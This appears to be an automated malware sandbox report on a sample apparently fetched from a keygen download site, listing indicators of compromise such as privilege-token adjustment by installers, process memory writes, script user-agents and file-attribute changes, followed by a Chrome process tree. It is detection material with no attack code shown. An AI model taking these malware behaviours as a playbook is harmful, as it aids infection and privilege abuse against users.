0300000001000000140000008d4c4a23ba9ee84ea7348fa98cc6e65fbb69de7b140000000100000014000000bbaf7e023dfaa6f13c848eadee3898ecd93232d4040000000100000010000000ab9b109ce8934f11e7cd22ed550680da0f0000000100000030000000a768343c4aeaced5c72f3571938864983a67ed49031c1da2495863caf65fe507011f7f0e70b6cb40e5631c07721be03419000000010000001000000082218ffb91733e64136be5719f57c3a15c0000000100000004000000001000001800000001000000100000002aa1c05e2ae606f198c2c5e937c97aa24b0000000100000044000000420032004600410046003700360039003200460044003900460046004200440036003400450044004500330031003700450034003200330033003400420041005f0000002000000001000000820500003082057e30820466a003020102021067def43ef17bdae24ff5940606d2c084300d06092a864886f70d01010c0500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a308185310b3009060355040613024742311b30190603550408131247726561746572204d616e636865737465723110300e0603550407130753616c666f7264311a3018060355040a1311434f4d4f444f204341204c696d69746564312b302906035504031322434f4d4f444f205253412043657274696669636174696f6e20417574686f7269747930820222300d06092a864886f70d01010105000382020f003082020a028202010091e85492d20a56b1ac0d24ddc5cf446774992b37a37d23700071bc53dfc4fa2a128f4b7f1056bd9f7072b7617fc94b0f17a73de3b00461eeff1197c7f4863e0afa3e5cf993e6347ad9146be79cb385a0827a76af7190d7ecfd0dfa9c6cfadfb082f4147ef9bec4a62f4f7f997fb5fc674372bd0c00d689eb6b2cd3ed8f981c14ab7ee5e36efcd8a8e49224da436b62b855fdeac1bc6cb68bf30e8d9ae49b6c6999f878483045d5ade10d3c4560fc32965127bc67c3ca2eb66bea46c7c720a0b11f65de4808baa44ea9f283463784ebe8cc814843674e722a9b5cbd4c1b288a5c227bb4ab98d9eee05183c309464e6d3e99fa9517da7c3357413c8d51ed0bb65caf2c631adf57c83fbce95dc49baf4599e2a35a24b4baa9563dcf6faaff4958bef0a8fff4b8ade937fbbab8f40b3af9e843421e89d884cb13f1d9bbe18960b88c2856ac141d9c0ae771ebcf0edd3da996a148bd3cf7afb50d224cc01181ec563bf6d3a2e25bb7b204225295809369e88e4c65f191032d707402ea8b671529695202bbd7df506a5546bfa0a328617f70d0c3a2aa2c21aa47ce289c064576bf821827b4d5aeb4cb50e66bf44c867130e9a6df1686e0d8ff40ddfbd042887fa3333a2e5c1e41118163ce18716b2beca68ab7315c3a6a47e0c37959d6201aaff26a98aa72bc574ad24b9dbb10fcb04c41e5ed1d3d5e289d9cccbfb351daa747e584530203010001a381f23081ef301f0603551d23041830168014a0110a233e96f107ece2af29ef82a57fd030a4b4301d0603551d0e04160414bbaf7e023dfaa6f13c848eadee3898ecd93232d4300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff30110603551d20040a300830060604551d200030430603551d1f043c303a3038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c303406082b0601050507010104283026302406082b060105050730018618687474703a2f2f6f6373702e636f6d6f646f63612e636f6d300d06092a864886f70d01010c050003820101007ff25635b06d954a4e74af3ae26f018b87d33297edf840d2775311d7c7162ec69de64856be80a9f8bc78d2c86317ae8ced1631fa1f18c90ec7ee48799fc7c9b9bccc8815e36861d19f1d4b6181d7560463c2086926f0f0e52fdfc00a2ba905f4025a6a89d7b4844295e3ebf776205e35d9c0cd2508134c71388e87b0338491991e91f1ac9e3fa71d60812c364154a0e246060bac1bc799368c5ea10ba49ed9424624c5c55b81aeada0a0dc9f36b88dc21d15fa88ad8110391f44f02b9fdd10540c0734b136d114fd07023dff7255ab27d62c814171298d41f450571a7e6560afcbc5287698aeb3a853768be621526bea21d0840e494e8853da922ee71d0866d7 ebgk3ugky5a.exe -
Runs ping.exe 1 TTPs 6 IoCs
pid Process 4340 PING.EXE 4276 PING.EXE 6592 PING.EXE 7128 PING.EXE 2832 PING.EXE 5648 PING.EXE -
Script User-Agent 8 IoCs
Uses user-agent string associated with script host/environment.
description flow ioc HTTP User-Agent header 294 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 311 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 408 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 413 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 260 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 265 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 271 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 291 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 1212 chrome.exe 1212 chrome.exe 3060 chrome.exe 3060 chrome.exe 4812 chrome.exe 4812 chrome.exe 4292 chrome.exe 4292 chrome.exe 4972 chrome.exe 4972 chrome.exe 512 chrome.exe 512 chrome.exe 5112 chrome.exe 5112 chrome.exe 4848 chrome.exe 4848 chrome.exe 5116 chrome.exe 5116 chrome.exe 2564 setups.tmp 2564 setups.tmp 4584 rundll32.exe 4584 rundll32.exe 2540 svchost.exe 2540 svchost.exe 4760 multitimer.exe 4760 multitimer.exe 4760 multitimer.exe 4760 multitimer.exe 4760 multitimer.exe 4760 multitimer.exe 4760 multitimer.exe 4760 multitimer.exe 4760 multitimer.exe 4760 multitimer.exe 4760 multitimer.exe 4760 multitimer.exe 4760 multitimer.exe 4760 multitimer.exe 4760 multitimer.exe 4760 multitimer.exe 4760 multitimer.exe 4760 multitimer.exe 5192 chrome.exe 5192 chrome.exe 3080 chrome.exe 3080 chrome.exe 3672 z3t0iohdxck.tmp 3672 z3t0iohdxck.tmp 6096 apipostback.exe 6096 apipostback.exe 3920 IBInstaller_97039.tmp 3920 IBInstaller_97039.tmp 3392 vpn.tmp 3392 vpn.tmp 3392 vpn.tmp 3392 vpn.tmp 6472 rundll32.exe 6472 rundll32.exe 7232 setups.tmp 7232 setups.tmp 6384 irecord.tmp 6384 irecord.tmp 6944 RunWW.exe 6944 RunWW.exe -
Suspicious behavior: MapViewOfSection 4 IoCs
pid Process 4920 MicrosoftEdgeCP.exe 4920 MicrosoftEdgeCP.exe 4920 MicrosoftEdgeCP.exe 4920 MicrosoftEdgeCP.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 5080 Setup.exe Token: SeCreateTokenPrivilege 3664 askinstall20.exe Token: SeAssignPrimaryTokenPrivilege 3664 askinstall20.exe Token: SeLockMemoryPrivilege 3664 askinstall20.exe Token: SeIncreaseQuotaPrivilege 3664 askinstall20.exe Token: SeMachineAccountPrivilege 3664 askinstall20.exe Token: SeTcbPrivilege 3664 askinstall20.exe Token: SeSecurityPrivilege 3664 askinstall20.exe Token: SeTakeOwnershipPrivilege 3664 askinstall20.exe Token: SeLoadDriverPrivilege 3664 askinstall20.exe Token: SeSystemProfilePrivilege 3664 askinstall20.exe Token: SeSystemtimePrivilege 3664 askinstall20.exe Token: SeProfSingleProcessPrivilege 3664 askinstall20.exe Token: SeIncBasePriorityPrivilege 3664 askinstall20.exe Token: SeCreatePagefilePrivilege 3664 askinstall20.exe Token: SeCreatePermanentPrivilege 3664 askinstall20.exe Token: SeBackupPrivilege 3664 askinstall20.exe Token: SeRestorePrivilege 3664 askinstall20.exe Token: SeShutdownPrivilege 3664 askinstall20.exe Token: SeDebugPrivilege 3664 askinstall20.exe Token: SeAuditPrivilege 3664 askinstall20.exe Token: SeSystemEnvironmentPrivilege 3664 askinstall20.exe Token: SeChangeNotifyPrivilege 3664 askinstall20.exe Token: SeRemoteShutdownPrivilege 3664 askinstall20.exe Token: SeUndockPrivilege 3664 askinstall20.exe Token: SeSyncAgentPrivilege 3664 askinstall20.exe Token: SeEnableDelegationPrivilege 3664 askinstall20.exe Token: SeManageVolumePrivilege 3664 askinstall20.exe Token: SeImpersonatePrivilege 3664 askinstall20.exe Token: SeCreateGlobalPrivilege 3664 askinstall20.exe Token: 31 3664 askinstall20.exe Token: 32 3664 askinstall20.exe Token: 33 3664 askinstall20.exe Token: 34 3664 askinstall20.exe Token: 35 3664 askinstall20.exe Token: SeDebugPrivilege 4760 multitimer.exe Token: SeDebugPrivilege 4584 rundll32.exe Token: SeDebugPrivilege 4584 rundll32.exe Token: SeTcbPrivilege 2540 svchost.exe Token: SeDebugPrivilege 4584 rundll32.exe Token: SeDebugPrivilege 4584 rundll32.exe Token: SeDebugPrivilege 4584 rundll32.exe Token: SeDebugPrivilege 4584 rundll32.exe Token: SeDebugPrivilege 4584 rundll32.exe Token: SeDebugPrivilege 4584 rundll32.exe Token: SeDebugPrivilege 4584 rundll32.exe Token: SeDebugPrivilege 4584 rundll32.exe Token: SeDebugPrivilege 4584 rundll32.exe Token: SeDebugPrivilege 4584 rundll32.exe Token: SeDebugPrivilege 4584 rundll32.exe Token: SeDebugPrivilege 4948 taskkill.exe Token: SeAssignPrimaryTokenPrivilege 2568 svchost.exe Token: SeIncreaseQuotaPrivilege 2568 svchost.exe Token: SeSecurityPrivilege 2568 svchost.exe Token: SeTakeOwnershipPrivilege 2568 svchost.exe Token: SeLoadDriverPrivilege 2568 svchost.exe Token: SeSystemtimePrivilege 2568 svchost.exe Token: SeBackupPrivilege 2568 svchost.exe Token: SeRestorePrivilege 2568 svchost.exe Token: SeShutdownPrivilege 2568 svchost.exe Token: SeSystemEnvironmentPrivilege 2568 svchost.exe Token: SeUndockPrivilege 2568 svchost.exe Token: SeManageVolumePrivilege 2568 svchost.exe Token: SeAssignPrimaryTokenPrivilege 2568 svchost.exe -
Suspicious use of FindShellTrayWindow 64 IoCs
pid Process 1212 chrome.exe 1212 chrome.exe 1212 chrome.exe 1212 chrome.exe 1212 chrome.exe 1212 chrome.exe 1212 chrome.exe 1212 chrome.exe 1212 chrome.exe 1212 chrome.exe 1212 chrome.exe 1212 chrome.exe 3080 chrome.exe 5840 Setup3310.tmp 3672 z3t0iohdxck.tmp 3080 chrome.exe 5976 ebgk3ugky5a.exe 3920 IBInstaller_97039.tmp 3392 vpn.tmp 3392 vpn.tmp 3392 vpn.tmp 3392 vpn.tmp 3392 vpn.tmp 3392 vpn.tmp 3392 vpn.tmp 3392 vpn.tmp 3392 vpn.tmp 3392 vpn.tmp 3392 vpn.tmp 3392 vpn.tmp 3392 vpn.tmp 3392 vpn.tmp 3392 vpn.tmp 3392 vpn.tmp 3392 vpn.tmp 3392 vpn.tmp 3392 vpn.tmp 3392 vpn.tmp 3392 vpn.tmp 3392 vpn.tmp 3392 vpn.tmp 3392 vpn.tmp 3392 vpn.tmp 3392 vpn.tmp 3392 vpn.tmp 3392 vpn.tmp 3392 vpn.tmp 3392 vpn.tmp 3392 vpn.tmp 3392 vpn.tmp 3392 vpn.tmp 3392 vpn.tmp 3392 vpn.tmp 3392 vpn.tmp 3392 vpn.tmp 3392 vpn.tmp 3392 vpn.tmp 3392 vpn.tmp 3392 vpn.tmp 3392 vpn.tmp 3392 vpn.tmp 3392 vpn.tmp 3392 vpn.tmp 3392 vpn.tmp -
Suspicious use of SetWindowsHookEx 3 IoCs
pid Process 4792 MicrosoftEdge.exe 4920 MicrosoftEdgeCP.exe 4920 MicrosoftEdgeCP.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1212 wrote to memory of 1856 1212 chrome.exe 72 PID 1212 wrote to memory of 1856 1212 chrome.exe 72 PID 1212 wrote to memory of 968 1212 chrome.exe 76 PID 1212 wrote to memory of 968 1212 chrome.exe 76 PID 1212 wrote to memory of 968 1212 chrome.exe 76 PID 1212 wrote to memory of 968 1212 chrome.exe 76 PID 1212 wrote to memory of 968 1212 chrome.exe 76 PID 1212 wrote to memory of 968 1212 chrome.exe 76 PID 1212 wrote to memory of 968 1212 chrome.exe 76 PID 1212 wrote to memory of 968 1212 chrome.exe 76 PID 1212 wrote to memory of 968 1212 chrome.exe 76 PID 1212 wrote to memory of 968 1212 chrome.exe 76 PID 1212 wrote to memory of 968 1212 chrome.exe 76 PID 1212 wrote to memory of 968 1212 chrome.exe 76 PID 1212 wrote to memory of 968 1212 chrome.exe 76 PID 1212 wrote to memory of 968 1212 chrome.exe 76 PID 1212 wrote to memory of 968 1212 chrome.exe 76 PID 1212 wrote to memory of 968 1212 chrome.exe 76 PID 1212 wrote to memory of 968 1212 chrome.exe 76 PID 1212 wrote to memory of 968 1212 chrome.exe 76 PID 1212 wrote to memory of 968 1212 chrome.exe 76 PID 1212 wrote to memory of 968 1212 chrome.exe 76 PID 1212 wrote to memory of 968 1212 chrome.exe 76 PID 1212 wrote to memory of 968 1212 chrome.exe 76 PID 1212 wrote to memory of 968 1212 chrome.exe 76 PID 1212 wrote to memory of 968 1212 chrome.exe 76 PID 1212 wrote to memory of 968 1212 chrome.exe 76 PID 1212 wrote to memory of 968 1212 chrome.exe 76 PID 1212 wrote to memory of 968 1212 chrome.exe 76 PID 1212 wrote to memory of 968 1212 chrome.exe 76 PID 1212 wrote to memory of 968 1212 chrome.exe 76 PID 1212 wrote to memory of 968 1212 chrome.exe 76 PID 1212 wrote to memory of 968 1212 chrome.exe 76 PID 1212 wrote to memory of 968 1212 chrome.exe 76 PID 1212 wrote to memory of 968 1212 chrome.exe 76 PID 1212 wrote to memory of 968 1212 chrome.exe 76 PID 1212 wrote to memory of 968 1212 chrome.exe 76 PID 1212 wrote to memory of 968 1212 chrome.exe 76 PID 1212 wrote to memory of 968 1212 chrome.exe 76 PID 1212 wrote to memory of 968 1212 chrome.exe 76 PID 1212 wrote to memory of 968 1212 chrome.exe 76 PID 1212 wrote to memory of 968 1212 chrome.exe 76 PID 1212 wrote to memory of 3060 1212 chrome.exe 77 PID 1212 wrote to memory of 3060 1212 chrome.exe 77 PID 1212 wrote to memory of 576 1212 chrome.exe 78 PID 1212 wrote to memory of 576 1212 chrome.exe 78 PID 1212 wrote to memory of 576 1212 chrome.exe 78 PID 1212 wrote to memory of 576 1212 chrome.exe 78 PID 1212 wrote to memory of 576 1212 chrome.exe 78 PID 1212 wrote to memory of 576 1212 chrome.exe 78 PID 1212 wrote to memory of 576 1212 chrome.exe 78 PID 1212 wrote to memory of 576 1212 chrome.exe 78 PID 1212 wrote to memory of 576 1212 chrome.exe 78 PID 1212 wrote to memory of 576 1212 chrome.exe 78 PID 1212 wrote to memory of 576 1212 chrome.exe 78 PID 1212 wrote to memory of 576 1212 chrome.exe 78 PID 1212 wrote to memory of 576 1212 chrome.exe 78 PID 1212 wrote to memory of 576 1212 chrome.exe 78 PID 1212 wrote to memory of 576 1212 chrome.exe 78 PID 1212 wrote to memory of 576 1212 chrome.exe 78 PID 1212 wrote to memory of 576 1212 chrome.exe 78 PID 1212 wrote to memory of 576 1212 chrome.exe 78 PID 1212 wrote to memory of 576 1212 chrome.exe 78 PID 1212 wrote to memory of 576 1212 chrome.exe 78 -
Views/modifies file attributes 1 TTPs 4 IoCs
pid Process 5916 attrib.exe 6208 attrib.exe 6788 attrib.exe 7020 attrib.exe
Processes
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s WpnService1⤵PID:2576
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Winmgmt1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2568
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Browser1⤵PID:2476
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s LanmanServer1⤵PID:2328
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s IKEEXT1⤵PID:2296
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection1⤵PID:1952
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s SENS1⤵PID:1456
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Themes1⤵PID:1280
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s UserManager1⤵PID:1216
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" https://keygenit.com/d/30f8668638112r4p2203.html1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:1212 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=86.0.4240.111 --initial-client-data=0xc8,0xcc,0xd0,0xa4,0xd4,0x7ffc56346e00,0x7ffc56346e10,0x7ffc56346e202⤵PID:1856
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1576,13733404578578226291,10018353004062448765,131072 --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1592 /prefetch:22⤵PID:968
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1576,13733404578578226291,10018353004062448765,131072 --lang=en-US --service-sandbox-type=network --mojo-platform-channel-handle=1640 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:3060
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1576,13733404578578226291,10018353004062448765,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2104 /prefetch:82⤵PID:576
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1576,13733404578578226291,10018353004062448765,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2624 /prefetch:12⤵PID:3540
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1576,13733404578578226291,10018353004062448765,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2632 /prefetch:12⤵PID:2748
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1576,13733404578578226291,10018353004062448765,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3236 /prefetch:12⤵PID:1364
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1576,13733404578578226291,10018353004062448765,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3244 /prefetch:12⤵PID:3932
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1576,13733404578578226291,10018353004062448765,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3248 /prefetch:12⤵PID:644
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1576,13733404578578226291,10018353004062448765,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3256 /prefetch:12⤵PID:2800
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1576,13733404578578226291,10018353004062448765,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4440 /prefetch:82⤵PID:4452
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1576,13733404578578226291,10018353004062448765,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3448 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:4812
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1576,13733404578578226291,10018353004062448765,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4652 /prefetch:82⤵PID:4868
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1576,13733404578578226291,10018353004062448765,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4824 /prefetch:82⤵PID:4952
-
-
C:\Program Files\Google\Chrome\Application\86.0.4240.111\Installer\chrmstp.exe"C:\Program Files\Google\Chrome\Application\86.0.4240.111\Installer\chrmstp.exe" --configure-user-settings --verbose-logging --system-level --force-configure-user-settings2⤵PID:4968
-
C:\Program Files\Google\Chrome\Application\86.0.4240.111\Installer\chrmstp.exe"C:\Program Files\Google\Chrome\Application\86.0.4240.111\Installer\chrmstp.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\Crashpad --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=86.0.4240.111 --initial-client-data=0x23c,0x240,0x244,0x218,0x248,0x7ff6bcfe7740,0x7ff6bcfe7750,0x7ff6bcfe77603⤵PID:5028
-
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1576,13733404578578226291,10018353004062448765,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4904 /prefetch:82⤵PID:5012
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1576,13733404578578226291,10018353004062448765,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5024 /prefetch:82⤵PID:5064
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1576,13733404578578226291,10018353004062448765,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4712 /prefetch:82⤵PID:3244
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1576,13733404578578226291,10018353004062448765,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3448 /prefetch:82⤵PID:4220
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1576,13733404578578226291,10018353004062448765,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5212 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:4292
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1576,13733404578578226291,10018353004062448765,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5828 /prefetch:82⤵PID:4476
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1576,13733404578578226291,10018353004062448765,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5976 /prefetch:82⤵PID:4504
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1576,13733404578578226291,10018353004062448765,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6104 /prefetch:82⤵PID:4624
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1576,13733404578578226291,10018353004062448765,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5348 /prefetch:82⤵PID:4716
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1576,13733404578578226291,10018353004062448765,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5704 /prefetch:82⤵PID:4892
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1576,13733404578578226291,10018353004062448765,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6288 /prefetch:82⤵PID:4908
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.FileUtilService --field-trial-handle=1576,13733404578578226291,10018353004062448765,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4712 /prefetch:82⤵PID:4900
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1576,13733404578578226291,10018353004062448765,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6680 /prefetch:82⤵PID:4868
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1576,13733404578578226291,10018353004062448765,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5684 /prefetch:82⤵PID:5024
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1576,13733404578578226291,10018353004062448765,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6728 /prefetch:82⤵PID:5084
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1576,13733404578578226291,10018353004062448765,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6676 /prefetch:82⤵PID:5004
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1576,13733404578578226291,10018353004062448765,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6916 /prefetch:82⤵PID:5112
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1576,13733404578578226291,10018353004062448765,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7024 /prefetch:82⤵PID:1044
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1576,13733404578578226291,10018353004062448765,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7156 /prefetch:82⤵PID:4100
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1576,13733404578578226291,10018353004062448765,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7260 /prefetch:82⤵PID:4304
-
-
